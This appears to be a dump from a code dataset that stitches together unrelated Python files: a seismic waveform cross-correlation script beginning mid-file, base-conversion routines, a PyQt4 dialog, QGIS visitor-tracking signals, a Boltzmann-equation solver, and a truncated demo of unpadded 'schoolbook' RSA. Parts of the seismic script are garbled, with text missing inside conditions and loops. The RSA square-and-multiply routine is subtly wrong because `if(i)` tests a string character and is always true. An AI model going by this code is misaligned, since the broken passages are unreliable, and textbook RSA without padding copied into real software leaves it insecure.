tmpelems_seq=line.split()\n #measure the lag between each other p1 p2 p3 p4......\n for i in range(len(tmpelems_seq)-1):\n for j in range(i+1,len(tmpelems_seq)):\n print('Now dealing with i,j',i,j)\n p1_str=tmpelems_seq[i]\n p2_str=tmpelems_seq[j]\n #convert to datetime\n p1=datetime.datetime.strptime(p1_str,'%Y%m%d%H%M%S')\n p2=datetime.datetime.strptime(p2_str,'%Y%m%d%H%M%S')\n tmp_pair=p1_str+'-'+p2_str # find '20180618133904-20180621043156', for example, in the .summary file\n pair_info=Suminfo[tmp_pair]\n tmpelems=pair_info.split() #tmpelems is, for example ['20180618133904-20180621043156', 'HV.ERZ4', '0.96', 'HV.ERZ2', '0.67']\n '''\n #To check again (or add filter) if they are a repeating EQ pair\n count_CCC=0 #number of station has CCC above the CCC_thres\n for n_cal in range( int((len(tmpelems)-1)/2) ):\n #number of calculations available for p1-p2 pair in the pairsf\n #-1 because the first is p1-p2 id, /2 because 2 elems output/calculation\n sta=tmpelems[2*n_cal+1]\n CCC=float(tmpelems[2*n_cal+2])\n if CCC>=CCC_thres:\n count_CCC+=1\n if count_CCC= p1_wind1_ed ):\n print('window outside the timeseries:W1-p1')\n continue\n p1_D_w1_slice=p1_D_w1.slice(starttime=obspy.UTCDateTime(p1_wind1_st),endtime=obspy.UTCDateTime(p1_wind1_ed))\n #p1_D_w1_slice.plot()\n #cut window for pair#2\n p2_wind1_st=p2+datetime.timedelta(seconds=tP2-p_wind[0][0]) #for pair#2, window#1(large),starttime\n p2_wind1_ed=p2+datetime.timedelta(seconds=tP2+p_wind[0][1])\n if not( p2_D_w1[0].stats.starttime<=p2_wind1_st and p2_D_w1[0].stats.endtime >= p2_wind1_ed ):\n print('window outside the timeseries:W1-p2')\n continue\n p2_D_w1_slice=p2_D_w1.slice(starttime=obspy.UTCDateTime(p2_wind1_st),endtime=obspy.UTCDateTime(p2_wind1_ed))\n #p2_D_w1_slice.plot()\n #detrend them\n #p1_D_w1_slice.detrend()\n #p2_D_w1_slice.detrend()\n '''\n #This is a bug in the interpolate() method, use interpolate(rate,method='linear') instead\n print('maxval:',np.max(np.abs(p1_D_w1_slice[0].data)),np.max(np.abs(p2_D_w1_slice[0].data)))\n if np.max(np.abs(p1_D_w1_slice[0].data))>1e10 or np.max(np.abs(p2_D_w1_slice[0].data))>1e10:\n #p1_D=obspy.read(eqpath+p1_str+'/waveforms/'+sta+'.sac')\n #p2_D=obspy.read(eqpath+p2_str+'/waveforms/'+sta+'.sac')\n #p1_D[0].interpolate(1/sampt)\n #p2_D[0].interpolate(1/sampt)\n tmpD1=p1_D.copy()\n tmpD2=p2_D.copy()\n print(tmpD1[0].stats)\n tmpD1.plot()\n print(tmpD2[0].stats)\n tmpD2.plot()\n time.sleep(1)\n '''\n CCC,lag=cal_CCF(p1_D_w1_slice[0].data,p2_D_w1_slice[0].data)\n midd=(p2_D_w1_slice[0].stats.npts)-1 #length of b?? at this idx, refdata align with target data\n dt=p2_D_w1_slice[0].stats.delta\n shP=(lag-midd)*(dt) #convert to second (dt correction of P)\n print(' 1st correction shift:%s sec'%(shP))\n #if np.abs(shP)>2:\n # plt.plot(p1_D_w1_slice[0].data,'k')\n # plt.plot(p2_D_w1_slice[0].data,'r')\n # plt.show()\n tP2_cor=tP2-shP #tP2_cor=P-shP\n p2_wind1_st=p2+datetime.timedelta(seconds=tP2_cor-p_wind[0][0]) #for pair#2, window#1(large),starttime\n p2_wind1_ed=p2+datetime.timedelta(seconds=tP2_cor+p_wind[0][1])\n if not( p2_D_w1[0].stats.starttime<=p2_wind1_st and p2_D_w1[0].stats.endtime >= p2_wind1_ed ):\n print('window outside the timeseries:W1-p2cor')\n continue\n p2_D_w1_slice=p2_D_w1.slice(starttime=obspy.UTCDateTime(p2_wind1_st),endtime=obspy.UTCDateTime(p2_wind1_ed)) #new slice for corrected p arrival\n if np.abs(shP)>10:\n print('large shift:',shP)\n #plt.figure()\n #plt.plot(p1_D_w1_slice[0].data,'k')\n #plt.plot(p2_D_w1_slice[0].data,'r')\n #plt.title('correction of shP='+str(shP))\n #plt.show()\n #plt.plot(p1_D_w1_slice[0].times(),p1_D_w1_slice[0].data,'k--')\n #plt.plot(p1_D_w1_slice[0].times(),p2_D_w1_slice[0].data,'r--')\n #plt.show()\n #----------------P arrival correction #1 finished, start #2 correction ------------#\n p1_D_w2=p1_D.copy() #copy from the original file since the original data will be used again later. w1:window1\n p2_D_w2=p2_D.copy()\n p1_D_w2[0].detrend('linear')\n p2_D_w2[0].detrend('linear')\n p1_D_w2[0].taper(max_percentage=0.05)\n p2_D_w2[0].taper(max_percentage=0.05)\n #bandpass filter for w#1\n p1_D_w2[0].filter('bandpass',freqmin=filt_freq_HR[0][0],freqmax=filt_freq_HR[0][1],corners=4,zerophase=True)\n p2_D_w2[0].filter('bandpass',freqmin=filt_freq_HR[0][0],freqmax=filt_freq_HR[0][1],corners=4,zerophase=True)\n #cut window for pair#1, in this case, tcs start time=folder name!!! p1=evid in datetime format\n p1_wind2_st=p1+datetime.timedelta(seconds=tP1-p_wind[1][0]) #for pair#1, window#1(large),starttime\n p1_wind2_ed=p1+datetime.timedelta(seconds=tP1+p_wind[1][1]) #endtime\n #print('2.cutting window for p1:',p1_wind2_st,p1_wind2_ed)\n if not( p1_D_w2[0].stats.starttime<=p1_wind2_st and p1_D_w2[0].stats.endtime >= p1_wind2_ed ):\n print('window outside the timeseries:W2-p1')\n continue\n p1_D_w2_slice=p1_D_w2.slice(starttime=obspy.UTCDateTime(p1_wind2_st),endtime=obspy.UTCDateTime(p1_wind2_ed))\n #p1_D_w1_slice.plot()\n #cut window for pair#2\n p2_wind2_st=p2+datetime.timedelta(seconds=tP2_cor-p_wind[1][0]) #for pair#2, window#1(large),starttime\n p2_wind2_ed=p2+datetime.timedelta(seconds=tP2_cor+p_wind[1][1])\n if not( p2_D_w2[0].stats.starttime<=p2_wind2_st and p2_D_w2[0].stats.endtime >= p2_wind2_ed ):\n print('window outside the timeseries:W2-p2')\n continue\n p2_D_w2_slice=p2_D_w2.slice(starttime=obspy.UTCDateTime(p2_wind2_st),endtime=obspy.UTCDateTime(p2_wind2_ed))\n #p2_D_w1_slice.plot()\n #detrend them\n #p1_D_w1_slice.detrend()\n #p2_D_w1_slice.detrend()\n CCC,lag=cal_CCF(p1_D_w2_slice[0].data,p2_D_w2_slice[0].data)\n midd=(p2_D_w2_slice[0].stats.npts)-1 #length of b?? at this idx, refdata align with target data\n dt=p2_D_w2_slice[0].stats.delta\n shP=(lag-midd)*(dt) #convert to second (dt correction of P)\n print(' 2nd correction shift:%s sec'%(shP))\n tP2_cor2=tP2_cor-shP #tP2_cor=P-shP , second correction\n p2_wind2_st=p2+datetime.timedelta(seconds=tP2_cor2-p_wind[1][0]) #for pair#2, window#1(large),starttime\n p2_wind2_ed=p2+datetime.timedelta(seconds=tP2_cor2+p_wind[1][1])\n if not( p2_D_w2[0].stats.starttime<=p2_wind2_st and p2_D_w2[0].stats.endtime >= p2_wind2_ed ):\n print('window outside the timeseries:W2-p2cor')\n continue\n p2_D_w2_slice=p2_D_w2.slice(starttime=obspy.UTCDateTime(p2_wind2_st),endtime=obspy.UTCDateTime(p2_wind2_ed)) #new slice for corrected p arrival\n #plt.plot(p1_D_w2_slice[0].times(),p1_D_w2_slice[0].data,'k*')\n #plt.plot(p1_D_w2_slice[0].times(),p2_D_w2_slice[0].data,'r*')\n #plt.close()\n #plt.show()\n #----------------P arrival correction #2 finished------------#\n #----------------make moving window CC-----------------------#\n L_data1=p1_D.copy()\n L_data2=p2_D.copy()\n #clean the large(L) window data\n L_data1[0].detrend('linear')\n L_data2[0].detrend('linear')\n L_data1[0].taper(max_percentage=0.05)\n L_data2[0].taper(max_percentage=0.05)\n L_data1[0].filter('bandpass',freqmin=filt_L_wind[0],freqmax=filt_L_wind[1],corners=4,zerophase=True)\n L_data2[0].filter('bandpass',freqmin=filt_L_wind[0],freqmax=filt_L_wind[1],corners=4,zerophase=True)\n #cut data by P info\n p1_L_wind_st=p1+datetime.timedelta(seconds=tP1-L_wind[0])\n p1_L_wind_ed=p1+datetime.timedelta(seconds=tP1+L_wind[1])\n #print('3.cutting window for calculation',p1_L_wind_st,p1_L_wind_ed)\n if not( L_data1[0].stats.starttime<=p1_L_wind_st and L_data1[0].stats.endtime >= p1_L_wind_ed ):\n print('window outside the timeseries:cut-Lp1')\n continue\n L_data1=L_data1.slice(starttime=obspy.UTCDateTime(p1_L_wind_st),endtime=obspy.UTCDateTime(p1_L_wind_ed))\n p2_L_wind_st=p2+datetime.timedelta(seconds=tP2_cor2-L_wind[0])\n p2_L_wind_ed=p2+datetime.timedelta(seconds=tP2_cor2+L_wind[1])\n if not( L_data2[0].stats.starttime<=p2_L_wind_st and L_data2[0].stats.endtime >= p2_L_wind_ed ):\n print('window outside the timeseries:cut-Lp2')\n continue\n L_data2=L_data2.slice(starttime=obspy.UTCDateTime(p2_L_wind_st),endtime=obspy.UTCDateTime(p2_L_wind_ed))\n #L_data1.plot()\n #L_data2.plot()\n #small window measurements\n #print(L_data1[0].stats.npts,L_data2[0].stats.npts)\n sampl=int(L_data1[0].stats.sampling_rate)\n movpts=int(mov*sampl)\n st=0\n ed=st+S_wind*sampl\n sav_lags=[]\n sav_st=[] #sec for measured window (P at 0sec)\n while ed= 0\n - base is a integer, 1 < base < 17\n Output: number^^power\n Postconditions:\n - returned value is a string containing only digits from input base\n '''\n new_number = '1'\n for index in range (0, power):\n new_number = multiplication(new_number, number, base)\n return (new_number)\n\ndef substitution_method(number, source_base, dest_base):\n '''\n Function converts a number from its source base to destination base\n Input: number, source_base, dest_base\n Preconditions:\n - number is a string containing only digits from source_base\n - source_base and dest_base are natural numbers 2 <= base <= 16\n source_base < dest_base\n Output: new number in destination base\n Postconditions: new number is a string containing only digits from destination base\n '''\n new_number = \"\"\n for index in range (0, len(number)):\n base_power = power(rest_transfer(source_base), len(number) - index - 1, dest_base)\n prod = multiplication(base_power, number[index], dest_base)\n new_number = addition(new_number, prod, dest_base)\n return (new_number)\n\ndef successive_division(number, source_base, dest_base):\n '''\n Function converts a number from its source base to destination base\n Input: number, source_base, dest_base\n Preconditions:\n - number is a string containing only digits from source_base\n - source_base and dest-base are natural numbers 2 <= base <= 16\n - source_base > dest_base\n Output: new number in destination base\n Postconditions: new number is a string containing only digits from destination base\n '''\n remainder = division_remainder(number, rest_transfer(dest_base), source_base)\n number = division_quotient(number, rest_transfer(dest_base), source_base)\n new_number = remainder\n while (number != '0'):\n remainder = division_remainder(number, rest_transfer(dest_base), source_base)\n new_number = remainder + new_number\n number = division_quotient(number, rest_transfer(dest_base), source_base)\n return (new_number)\n","sub_path":"Project/conversions.py","file_name":"conversions.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"438408069","text":"\nfrom PyQt4 import QtCore, QtGui\n\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n _fromUtf8 = lambda s: s\n\nclass Ui_StorageDialog(object):\n def setupUi(self, StorageDialog):\n StorageDialog.setObjectName(_fromUtf8(\"StorageDialog\"))\n StorageDialog.resize(231, 184)\n StorageDialog.setStyleSheet(_fromUtf8(\"QWidget, QMenuBar::item, QHeaderView::section {\\n\"\n\" background-color: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1,\\n\"\n\" stop: 0 #c5d8ef, stop: 1 #89a5c3);\\n\"\n\"}\\n\"\n\"\\n\"\n\"QLabel, QSlider {\\n\"\n\" background-color: transparent;\\n\"\n\"}\"))\n StorageDialog.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))\n self.verticalLayout_2 = QtGui.QVBoxLayout(StorageDialog)\n self.verticalLayout_2.setObjectName(_fromUtf8(\"verticalLayout_2\"))\n self.verticalLayout = QtGui.QVBoxLayout()\n self.verticalLayout.setSizeConstraint(QtGui.QLayout.SetNoConstraint)\n self.verticalLayout.setObjectName(_fromUtf8(\"verticalLayout\"))\n self.namelabel = QtGui.QLabel(StorageDialog)\n sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.namelabel.sizePolicy().hasHeightForWidth())\n self.namelabel.setSizePolicy(sizePolicy)\n self.namelabel.setObjectName(_fromUtf8(\"namelabel\"))\n self.verticalLayout.addWidget(self.namelabel)\n self.horizontalLayout_2 = QtGui.QHBoxLayout()\n self.horizontalLayout_2.setObjectName(_fromUtf8(\"horizontalLayout_2\"))\n self.id = QtGui.QLineEdit(StorageDialog)\n self.id.setEnabled(True)\n self.id.setReadOnly(False)\n self.id.setObjectName(_fromUtf8(\"id\"))\n self.horizontalLayout_2.addWidget(self.id)\n self.verticalLayout.addLayout(self.horizontalLayout_2)\n self.volumelabel = QtGui.QLabel(StorageDialog)\n sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.volumelabel.sizePolicy().hasHeightForWidth())\n self.volumelabel.setSizePolicy(sizePolicy)\n self.volumelabel.setObjectName(_fromUtf8(\"volumelabel\"))\n self.verticalLayout.addWidget(self.volumelabel)\n self.horizontalLayout_3 = QtGui.QHBoxLayout()\n self.horizontalLayout_3.setObjectName(_fromUtf8(\"horizontalLayout_3\"))\n self.volume = QtGui.QLineEdit(StorageDialog)\n self.volume.setEnabled(True)\n self.volume.setReadOnly(False)\n self.volume.setObjectName(_fromUtf8(\"volume\"))\n self.horizontalLayout_3.addWidget(self.volume)\n self.verticalLayout.addLayout(self.horizontalLayout_3)\n self.typelabel = QtGui.QLabel(StorageDialog)\n self.typelabel.setObjectName(_fromUtf8(\"typelabel\"))\n self.verticalLayout.addWidget(self.typelabel)\n self.type = QtGui.QLineEdit(StorageDialog)\n self.type.setObjectName(_fromUtf8(\"type\"))\n self.verticalLayout.addWidget(self.type)\n self.horizontalLayout = QtGui.QHBoxLayout()\n self.horizontalLayout.setObjectName(_fromUtf8(\"horizontalLayout\"))\n self.OK = QtGui.QPushButton(StorageDialog)\n self.OK.setObjectName(_fromUtf8(\"OK\"))\n self.horizontalLayout.addWidget(self.OK)\n self.Cancel = QtGui.QPushButton(StorageDialog)\n self.Cancel.setObjectName(_fromUtf8(\"Cancel\"))\n self.horizontalLayout.addWidget(self.Cancel)\n self.verticalLayout.addLayout(self.horizontalLayout)\n self.verticalLayout_2.addLayout(self.verticalLayout)\n\n self.retranslateUi(StorageDialog)\n QtCore.QObject.connect(self.OK, QtCore.SIGNAL(_fromUtf8(\"clicked()\")), StorageDialog.accept)\n QtCore.QObject.connect(self.Cancel, QtCore.SIGNAL(_fromUtf8(\"clicked()\")), StorageDialog.reject)\n QtCore.QMetaObject.connectSlotsByName(StorageDialog)\n\n def retranslateUi(self, StorageDialog):\n StorageDialog.setWindowTitle(QtGui.QApplication.translate(\"StorageDialog\", \"Edit Storage\", None, QtGui.QApplication.UnicodeUTF8))\n self.namelabel.setText(QtGui.QApplication.translate(\"StorageDialog\", \"Name:\", None, QtGui.QApplication.UnicodeUTF8))\n self.volumelabel.setText(QtGui.QApplication.translate(\"StorageDialog\", \"Capacity:\", None, QtGui.QApplication.UnicodeUTF8))\n self.typelabel.setText(QtGui.QApplication.translate(\"StorageDialog\", \"Type:\", None, QtGui.QApplication.UnicodeUTF8))\n self.OK.setText(QtGui.QApplication.translate(\"StorageDialog\", \"OK\", None, QtGui.QApplication.UnicodeUTF8))\n self.Cancel.setText(QtGui.QApplication.translate(\"StorageDialog\", \"Cancel\", None, QtGui.QApplication.UnicodeUTF8))\n\nfrom . import resources_rc\n","sub_path":"DCGUI/Windows/ui_StorageDialog.py","file_name":"ui_StorageDialog.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"255509645","text":"# coding=utf-8\n\"\"\"\"QGIS News app signals\n\n.. note:: This program is free software; you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation; either version 2 of the License, or\n (at your option) any later version.\n\n\"\"\"\n\n__author__ = 'elpaso@itopen.it'\n__date__ = '2019-05-08'\n__copyright__ = 'Copyright 2019, ItOpen'\n\ndef setup_group(sender, **kwargs):\n \"\"\"Create qgisfeedentry_authors group and assign permissions\"\"\"\n\n from django.contrib.auth.models import User, Group, Permission\n group, is_new = Group.objects.get_or_create(name='qgisfeedentry_authors')\n if is_new:\n for perm in ('view_qgisfeedentry', 'add_qgisfeedentry'):\n group.permissions.add(Permission.objects.get(codename=perm))\n\n for staff_user in User.objects.filter(is_staff=True, is_superuser=False):\n group.user_set.add(staff_user)\n\n\n# Post save user visit signals\ndef post_save_user_visit(sender, instance, **kwargs):\n import re\n from django.contrib.gis.geoip2 import GeoIP2\n from qgisfeed.models import QgisUserVisit\n from user_visit.models import UserVisit\n\n g = GeoIP2()\n country_data = {}\n qgis_version = ''\n platform_name = ''\n\n if instance.remote_addr:\n try:\n country_data = g.city(instance.remote_addr)\n except: # AddressNotFoundErrors:\n country_data = {}\n\n version_match = re.search('QGIS(.*)\\/', instance.ua_string)\n\n if version_match:\n qgis_version = version_match.group().replace('QGIS', '').strip('/')\n platform_name = instance.ua_string[version_match.end():]\n\n if not platform_name:\n if instance.user_agent:\n platform_name = instance.user_agent.get_os()\n\n QgisUserVisit.objects.get_or_create(\n user_visit=instance,\n location=country_data,\n qgis_version=qgis_version,\n platform=platform_name\n )\n\n UserVisit.objects.filter(pk=instance.pk).update(remote_addr='')\n","sub_path":"qgisfeedproject/qgisfeed/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"620024269","text":"from collections import namedtuple\nimport numpy as np\nfrom matplotlib import pyplot as plt\nplt.switch_backend('agg')\nimport matplotlib.cm as cm\nimport time\nfrom read_starcd import write_tecplot\n\ndef f_maxwell(vx, vy, vz, T, n, ux, uy, uz, Rg):\n \"\"\"Compute maxwell distribution function on cartesian velocity mesh\n \n vx, vy, vz - 3d numpy arrays with x, y, z components of velocity mesh\n in each node\n T - float, temperature in K\n n - float, numerical density\n ux, uy, uz - floats, x,y,z components of equilibrium velocity\n Rg - gas constant for specific gas\n \"\"\"\n return n * ((1. / (2. * np.pi * Rg * T)) ** (3. / 2.)) * (np.exp(-((vx - ux)**2 + (vy - uy)**2 + (vz - uz)**2) / (2. * Rg * T)))\n\nclass GasParams:\n Na = 6.02214129e+23 # Avogadro constant\n kB = 1.381e-23 # Boltzmann constant, J / K\n Ru = 8.3144598 # Universal gas constant\n\n def __init__(self, Mol = 40e-3, Pr = 2. / 3., g = 5. / 3., d = 3418e-13):\n self.Mol = Mol\n self.Rg = self.Ru / self.Mol # J / (kg * K) \n self.m = self.Mol / self.Na # kg\n \n self.Pr = Pr\n \n self.C = 144.4\n self.T_0 = 273.11\n self.mu_0 = 2.125e-05\n self.mu_suth = lambda T: self.mu_0 * ((self.T_0 + self.C) / (T + self.C)) * ((T / self.T_0) ** (3. / 2.))\n self.mu = lambda T: self.mu_suth(200.) * (T/200.)**0.734\n self.g = g # specific heat ratio\n self.d = d # diameter of molecule\n \nclass Problem:\n def __init__(self, bc_type_list = None, bc_data = None, f_init = None):\n # list of boundary conditions' types\n # acording to order in starcd '.bnd' file\n # list of strings\n self.bc_type_list = bc_type_list\n # data for b.c.: wall temperature, inlet n, u, T and so on.\n # list of lists\n self.bc_data = bc_data\n # Function to set initial condition\n self.f_init = f_init\n\ndef set_bc(gas_params, bc_type, bc_data, f, vx, vy, vz, vn):\n \"\"\"Set boundary condition\n \"\"\"\n if (bc_type == 'sym-x'): # symmetry in x\n return f[::-1, :, :]\n elif (bc_type == 'sym-y'): # symmetry in y\n return f[:, ::-1, :]\n elif (bc_type == 'sym-z'): # symmetry in z\n return f[:, :, ::-1]\n elif (bc_type == 'sym'): # zero derivative\n return f[:, :, :]\n elif (bc_type == 'in'): # inlet\n # unpack bc_data\n n = bc_data[0]\n ux = bc_data[1]\n uy = bc_data[2]\n uz = bc_data[3]\n T = bc_data[4]\n return f_maxwell(vx, vy, vz, T, n, ux, uy, uz, gas_params.Rg)\n elif (bc_type == 'out'): # outlet\n # unpack bc_data\n n = bc_data[0]\n ux = bc_data[1]\n uy = bc_data[2]\n uz = bc_data[3]\n T = bc_data[4]\n return f_maxwell(vx, vy, vz, T, n, ux, uy, uz, gas_params.Rg)\n elif (bc_type == 'wall'): # wall\n # unpack bc_data\n T_w = bc_data[0]\n hv = vx[1, 0, 0] - vx[0, 0, 0]\n fmax = f_maxwell(vx, vy, vz, T_w, 1., 0., 0., 0., gas_params.Rg)\n Ni = (hv**3) * np.sum(f * np.where(vn > 0, vn, 0.))\n Nr = (hv**3) * np.sum(fmax * np.where(vn < 0, vn, 0.))\n # TODO: replace np.sqrt(2 * np.pi / (gas_params.Rg * T_w))\n # with discrete quarature, as in the dissertation\n n_wall = - Ni/ Nr\n# n_wall = 2e+23 # temprorary\n return n_wall * fmax\n \ndef comp_macro_param_and_j(f, vx, vy, vz, gas_params):\n Rg = gas_params.Rg\n hv = vx[1, 0, 0] - vx[0, 0, 0]\n n = (hv ** 3) * np.sum(f)\n\n ux = (1. / n) * (hv ** 3) * np.sum(vx * f)\n uy = (1. / n) * (hv ** 3) * np.sum(vy * f)\n uz = (1. / n) * (hv ** 3) * np.sum(vz * f)\n \n v2 = vx*vx + vy*vy + vz*vz\n u2 = ux*ux + uy*uy + uz*uz\n \n T = (1. / (3. * n * Rg)) * ((hv ** 3) * np.sum(v2 * f) - n * u2)\n\n Vx = vx - ux\n Vy = vy - uy\n Vz = vz - uz\n\n rho = gas_params.m * n\n\n p = rho * Rg * T\n\n cx = Vx / ((2. * Rg * T) ** (1. / 2.))\n cy = Vy / ((2. * Rg * T) ** (1. / 2.))\n cz = Vz / ((2. * Rg * T) ** (1. / 2.))\n \n c2 = cx*cx + cy*cy + cz*cz\n\n Sx = (1. / n) * (hv ** 3) * np.sum(cx * c2 * f)\n Sy = (1. / n) * (hv ** 3) * np.sum(cy * c2 * f)\n Sz = (1. / n) * (hv ** 3) * np.sum(cz * c2 * f)\n\n mu = gas_params.mu(T)\n\n f_plus = f_maxwell(vx, vy, vz, T, n, ux, uy, uz, gas_params.Rg) * (1. + (4. / 5.) * (1. - gas_params.Pr) * (cx*Sx + cy*Sy + cz*Sz) * (c2 - (5. / 2.)))\n\n J = (f_plus - f) * (p / mu)\n \n nu = p / mu\n \n return J, n, ux, uy, uz, T, nu, rho, p\n\n \ndef solver(gas_params, problem, mesh, nt, vmax, nv, CFL, filename, init = '0'):\n \"\"\"Solve Boltzmann equation with model collision integral \n \n gas_params -- object of class GasParams, contains gas parameters and viscosity law\n \n problem -- object of class Problem, contains list of boundary conditions,\n data for b.c., and function for initial condition\n \n mesh - object of class Mesh\n \n nt -- number of time steps\n \n vmax -- maximum velocity in each direction in velocity mesh\n \n nv -- number of nodes in velocity mesh\n \n CFL -- courant number\n \n filename -- name of output file for f\n \n init - name of restart file\n \"\"\"\n \n h = np.min(mesh.cell_diam)\n tau = h * CFL / (vmax * (3.**0.5))\n \n hv = 2. * vmax / nv\n vx_ = np.linspace(-vmax+hv/2, vmax-hv/2, nv) # coordinates of velocity nodes\n \n vx, vy, vz = np.meshgrid(vx_, vx_, vx_, indexing='ij')\n \n # set initial condition \n f = np.zeros((mesh.nc, nv, nv, nv))\n if (init == '0'):\n for i in range(mesh.nc):\n x = mesh.cell_center_coo[i, 0]\n y = mesh.cell_center_coo[i, 1]\n z = mesh.cell_center_coo[i, 2]\n f[i, :, :, :] = problem.f_init(x, y, z, vx, vy, vz) \n else:\n# restart from distribution function\n f = np.reshape(np.load(init), (mesh.nc, nv, nv, nv))\n# restart form macroparameters array\n# init_data = np.loadtxt(init)\n# for ic in range(mesh.nc):\n# f[ic, :, :, :] = f_maxwell(vx, vy, vz, init_data[ic, 5], init_data[ic, 0], init_data[ic, 1], init_data[ic, 2], init_data[ic, 3], gas_params.Rg)\n \n # TODO: may be join f_plus and f_minus in one array\n f_plus = np.zeros((mesh.nf, nv, nv, nv)) # Reconstructed values on the right\n f_minus = np.zeros((mesh.nf, nv, nv, nv)) # reconstructed values on the left\n flux = np.zeros((mesh.nf, nv, nv, nv)) # Flux values\n rhs = np.zeros((mesh.nc, nv, nv, nv))\n df = np.zeros((mesh.nc, nv, nv, nv)) # Array for increments \\Delta f \n vn = np.zeros((mesh.nf, nv, nv, nv))\n for jf in range(mesh.nf):\n vn[jf, :, :, :] = mesh.face_normals[jf, 0] * vx + mesh.face_normals[jf, 1] * vy + mesh.face_normals[jf, 2] * vz\n\n diag = np.zeros((mesh.nc, nv, nv, nv)) # part of diagonal coefficient in implicit scheme\n # precompute diag\n for ic in range(mesh.nc):\n for j in range(6):\n jf = mesh.cell_face_list[ic, j]\n vnp = np.where(mesh.cell_face_normal_direction[ic, j] * vn[jf, :, :, :] > 0,\n mesh.cell_face_normal_direction[ic, j] * vn[jf, :, :, :], 0.)\n diag[ic, :, :, :] += (mesh.face_areas[jf] / mesh.cell_volumes[ic]) * vnp\n # Arrays for macroparameters\n n = np.zeros(mesh.nc)\n rho = np.zeros(mesh.nc)\n ux = np.zeros(mesh.nc)\n uy = np.zeros(mesh.nc)\n uz = np.zeros(mesh.nc)\n p = np.zeros(mesh.nc)\n T = np.zeros(mesh.nc)\n nu = np.zeros(mesh.nc)\n data = np.zeros((mesh.nc, 7))\n\n frob_norm_iter = np.array([])\n\n it = 0\n while(it < nt):\n it += 1\n # reconstruction for inner faces\n # 1st order\n for ic in range(mesh.nc):\n for j in range(6):\n jf = mesh.cell_face_list[ic, j]\n # TODO: think how do this without 'if'\n if (mesh.cell_face_normal_direction[ic, j] == 1):\n f_minus[jf, :, :, :] = f[ic, :, :, :]\n else:\n f_plus[jf, :, :, :] = f[ic, :, :, :]\n \n # boundary condition\n # loop over all boundary faces\n for j in range(mesh.nbf):\n jf = mesh.bound_face_info[j, 0] # global face index\n bc_num = mesh.bound_face_info[j, 1]\n bc_type = problem.bc_type_list[bc_num]\n bc_data = problem.bc_data[bc_num]\n if (mesh.bound_face_info[j, 2] == 1):\n # TODO: normal velocities vn can be pre-computed one time\n # then we can pass to function p.bc only vn\n f_plus[jf, :, :, :] = set_bc(gas_params, bc_type, bc_data, f_minus[jf, :, :, :], vx, vy, vz, vn[jf, :, :, :])\n else:\n f_minus[jf, :, :, :] = set_bc(gas_params, bc_type, bc_data, f_plus[jf, :, :, :], vx, vy, vz, -vn[jf, :, :, :])\n\n # riemann solver - compute fluxes\n for jf in range(mesh.nf):\n # TODO: Pre-compute array of vn[:] ???\n flux[jf, :, :, :] = mesh.face_areas[jf] * vn[jf, :, :, :] * \\\n np.where((vn[jf, :, :, :] < 0), f_plus[jf, :, :, :], f_minus[jf, :, :, :])\n# flux[jf] = (1. / 2.) * mesh.face_areas[jf] * ((vn * (f_plus[jf, :, :, :] + f_minus[jf, :, :, :])) - (vn_abs * (f_plus[jf, :, :, :] - f_minus[jf, :, :, :])))\n \n # computation of the right-hand side\n rhs[:] = 0.\n for ic in range(mesh.nc):\n # sum up fluxes from all faces of this cell\n for j in range(6):\n jf = mesh.cell_face_list[ic, j]\n rhs[ic, :, :, :] += - (mesh.cell_face_normal_direction[ic, j]) * (1. / mesh.cell_volumes[ic]) * flux[jf, :, :, :]\n # Compute macroparameters and collision integral\n J, n[ic], ux[ic], uy[ic], uz[ic], T[ic], nu[ic], rho[ic], p[ic] = comp_macro_param_and_j(f[ic, :, :, :], vx, vy, vz, gas_params)\n rhs[ic, :, :, :] += J\n \n frob_norm_iter = np.append(frob_norm_iter, np.linalg.norm(rhs))\n # \n # update values - explicit scheme\n #\n f += tau * rhs\n \n if ((it % 50) == 0): \n fig, ax = plt.subplots(figsize = (20,10))\n line, = ax.semilogy(frob_norm_iter/frob_norm_iter[0])\n ax.set(title='$Steps =$' + str(it))\n plt.grid(True)\n plt.savefig('norm_iter.png')\n plt.close()\n \n data[:, 0] = n[:]\n data[:, 1] = ux[:]\n data[:, 2] = uy[:]\n data[:, 3] = uz[:]\n data[:, 4] = p[:]\n data[:, 5] = T[:]\n data[:, 6] = np.zeros(mesh.nc)\n \n write_tecplot(mesh, data, 'tec.dat', ('n', 'ux', 'uy', 'uz', 'p', 'T', 'rank'))\n np.save(filename, np.ravel(f))\n \n Return = namedtuple('Return', ['f', 'n', 'ux', 'uy', 'uz', 'T', 'p', 'frob_norm_iter'])\n \n S = Return(f, n, ux, uy, uz, T, p, frob_norm_iter)\n \n return S\n","sub_path":"code/explicit/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":10947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"227899366","text":"#this is schoolbook RSA and should not be used in praxis (e.g. padded must be added...)\n#this version ist for demonstration purposes only\n#this version uses Square and Multiply for the exponentiation\n\nplain = 6 #text as number to encrypt\n\np = 11 #choose to primes, both(p and q) need to be kept secret\nq = 7\nn = p*q\nphi = (p-1)*(q-1)\npubkey = 7 #gcd(pubkey,phi)=1\nprivkey = 43 #pubkey*privkey mod phi = 1\n\ndef exp(base, exponent, prim):\n\tresult = base\n\tbinExp=bin(exponent)[3:]\n\tfor i in binExp:\n\t\tresult = result * result\n\t\tif(i):\n\t\t\tresult = base * result\n\t\tresult = result % 